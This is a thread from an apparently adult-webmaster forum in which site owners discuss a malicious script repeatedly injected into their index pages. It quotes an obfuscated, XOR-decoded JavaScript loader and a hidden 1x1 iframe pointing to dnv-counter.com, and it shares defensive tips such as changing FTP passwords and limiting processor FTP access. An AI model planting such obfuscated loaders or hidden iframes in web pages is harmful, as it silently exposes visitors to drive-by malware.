maxxxxx

Checked out a new sologirl site which gave me a virus alert: "signature of js/shellcode virus found" which seems to be some kind of trojan. Contacted the owner who said that he wasn't aware of any javascript on his site. However, this piece of javascript was removed from his site minutes after I had contacted him:

<script language="JavaScript">
e = '0x00' + '29';str1 = "%92%CA%C1%DC%B6%DB%DA%D1%C2%CD%95%88%DC%C1%DB%C1% C8%C1%C2%C1%DA%D1%90%CE%C1%CA%CA%CD%C4%88%94%92%C1 %CC%D8%C9%C5%CD%B6%DB%D8%CB%95%88%CE%DA%DA%C6%90%8 7%87%CA%C4%DC%85%CB%C7%DD%C4%DA%CD%D8%84%CB%C7%C5% 87%CA%C4%DC%9B%87%88%B6%DF%C1%CA%DA%CE%95%99%B6%CE %CD%C1%CF%CE%DA%95%99%94%92%87%C1%CC%D8%C9%C5%CD%9 4%92%87%CA%C1%DC%94%B6%A5%A0";str=tmp='';for(i=0;i <str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script>

Can anyone do something with this? Any idea what this js/shellcode virus is? Just trying to find out what's going on.

__________________


****Teen Harbour**** - Home of Little Caprice
-------------------------------------------------------------------
In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship.

Huskie

Thats shitty

Quickdraw

Another one that bvelongs to dnv-counter--
<div style="visibilitydden"><i frame src="ht://dnv- counter.com/dnv3/" width=1 height=1></iframe></div>

maxxxxx

Thanks - any problems with that? Or was the virus alert something else?

__________________


****Teen Harbour**** - Home of Little Caprice
-------------------------------------------------------------------
In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship.

Quickdraw

oh yeah, it's trouble for sure. There are a lot of threads about this. Hacking 'open' scripts and inserting the code(s) into templates, etc..

Shoehorn!

What site did you find that on?

__________________

maxxxxx

I leave the site away. It's gone now, so I can't prove it anyway that it was ever there.

__________________


****Teen Harbour**** - Home of Little Caprice
-------------------------------------------------------------------
In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship.

maxxxxx

Quickdraw, you are the expert - can you point me to any of those threads or other reading stuff about it? Much appreciated - thanks!

__________________


****Teen Harbour**** - Home of Little Caprice
-------------------------------------------------------------------
In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship.

PornAddict

I've had that script installed on a couple of my sites and have been trying to track down how it's getting done.

The only active scripts I have installed on my server are those from NATS, CCbill and PayCom. I've contacted each, along with my host and no one can point me to what's happening.

Anyone got any info?

- PornAddict

maxxxxx

You mean it got added to your sites from outside? Server hacked? Wow...

__________________


****Teen Harbour**** - Home of Little Caprice
-------------------------------------------------------------------
In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship.

Quickdraw

http://www.google.com/search?hl=en&l...dnv-counter%22

As GFY search is just about worthless, this google link is the best I can do.

Yes, I believe for the most part, that these scripts are part of a hack and not the webmaster doing it on purpose. There are several webmasters on this board that have been hit.

There was a poster the other day that had a bit of info n this company, but I don't remember the username, or the post.. so maybe the bump will let them find you

djroof

I have the same on my site juicydevils.com yes this is huge shitty... u delete it and after time is there again...

PornAddict

That's exactly what I'm talking about!

It just seems like the script is added every once in a while. So far, 3 times in the past 2 months I've found it on the same 2-3 sites and no one can seem to find the problem. I always get the standard, "it's not us... it must be someone else's scripts" reply.

I wish there were something more I can do but I'm screwed at the moment.

- PornAddict

Quickdraw

Check your scripts' template files, if you have any.

PornAddict

Oh... another thing to point out is that they only seem to show up on the index files, no tour or join pages. The index files aren't templates, either... they're done manually and uploaded via ftp. So somehow, they can add this bit of code into my pages once they're uploaded.

- PornAddict

V_RocKs

Usually they upload their own httpd... then run it... so it is added to the index file on the fly... the code won't actually be in the index file.

Ray@TastyDollars

We had that code on two of our TGP's. ICQ me if you want details, 161 375 873

thx,
Ray

__________________

frank7799

Had the same problem some days ago and discussed it on another board. I remember that the same script problem was brought to GFY because I posted in that thread.

maxxxxx

PornAddict, what did your hosting company say?

__________________


****Teen Harbour**** - Home of Little Caprice
-------------------------------------------------------------------
In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship.

maxxxxx

Found it:


http://www.gfy.com/showthread.php?t=...ighlight=virus

__________________


****Teen Harbour**** - Home of Little Caprice
-------------------------------------------------------------------
In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship.

PornAddict

When I contacted them, I told them that I think my server has been hacked and if they can look around to see what happened. I told them about how the javascript was being installed on certain files.

The tech did a search and said that there was no actual hack but to check my scripts. That was it... I don't know which scripts or anything. All I do know is that I currently only have 4 scripts running on that server (ccbill, paycom, pennywize and nats).

It seems like they keep attacking the same 3 sites. What's weird is that the sites that are targeted are ones that were set up via paycom. I then contacted paycom because I remembered seeing a post on here about paycom's info being compromised and their scripts left open. It seemed like the case was cracked. I had paycom check around and nothing in their end (on my server) seemed to be modified, but they uploaded a fresh script regardless just to see. It has then happened again.

So, that's kinda where I am now. Still searching for an answer and a solution on how to prevent this from happening.

I don't know what the script does, but I know my mcafee picks it up and deletes it immediately... however, I don't know what it's doing to those without virus protection.

The way I normally catch it is when I ftp, I see the dates on which certain files were modified. There's no reason to ever update my index file (since it's just a standard warning / entrance page) so when I see newer dates, I know something is up.

- PornAddict

frank7799

I had the hosting company looking for attacks, too. They didn´t find any. I don´t run scripts except a tgp script, but that site wasn´t involved in the attack.

The only way to get it on my server was using ftp, I think. So I changed logins and passwords and limited ftp to a single account. Until now I didn´t get the script again.

E$_manager

that is so nasty!

__________________
Enjoy more sales with EnjoyBucks!
Homemade: Asian : Ebony : GFs : Voyeur : Nudist : Public : 3D

CaptainHowdy

Fuckers !!

__________________
Vacares - Web Hosting, Domains, O365, Security & More - Paxum and BTC Accepted

Windows VPS now available
Great for TSS, Nifty Stats, remote work, virtual assistants, etc.

SmokeyTheBear

theres quite a few different script being hit , one of the noteable is wordpress , and once a site is sompromised you might as well consider the whole server compromised.. if you are affected and your host cant do anything or wont hit me up on icq.

__________________
hatisblack at yahoo.com

DutchTeenCash

yeah fucking js script had it too - hope youll solve it soon

__________________

ICQ 16 91 547 - SKYPE dutchteencash
bob AT dutchteencash DOT com
... did you see our newest Sweet Natural Girl Priscilla (18)?

maxxxxx

There's more on http://www.******************/index.php?showtopic=2559
Isn't it possible to take that dnv-counter.com domain out?

__________________


****Teen Harbour**** - Home of Little Caprice
-------------------------------------------------------------------
In a perfect world... spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship.

V_RocKs

ICQ me and I can check it out for you. 1611-24816

NastyNed

First, I want to thank Maxxxxx for protecting my identity... it was on one of my sites that he found this shit. I talked to my host... and he didn't want to implicate anybody... but he said that when CC Bill's system was breached a while back (and no one's blaming CC Bill for any of this - it's the asshole hacks who perpetrated it), that this problem started occurring on about 95% of their sites... possibly from the fact that CC Bill has FTP access to all of our servers. This shit keeps coming back because the dickheads keep loading it onto your server every 2 or 3 weeks, or so. His recommendation was check your files on your local host... clean them out... and make a habit of uploading your clean files every day... and also...

...CHANGE YOUR FTP PASSWORD!!!

When you put up a new site with ANY webmerchant, change your/their password until you get through the approval process... once you get approved... change it back.

That should stop these pricks right in their tracks.
(until they figure out something new)

Make sense?

__________________
EASY Bonus Tiers:

V_RocKs

Also install FTP on a non standard port... They come in via scripts and it is all automated... Also, don't give your processor FTP access. Or allow them access on a seperate account you created just for them and then disable it after the initial setup.

chase

what if your wordpress install is in a member's area?

__________________
Need Hosting? Reality Check Network services me purrrfectly!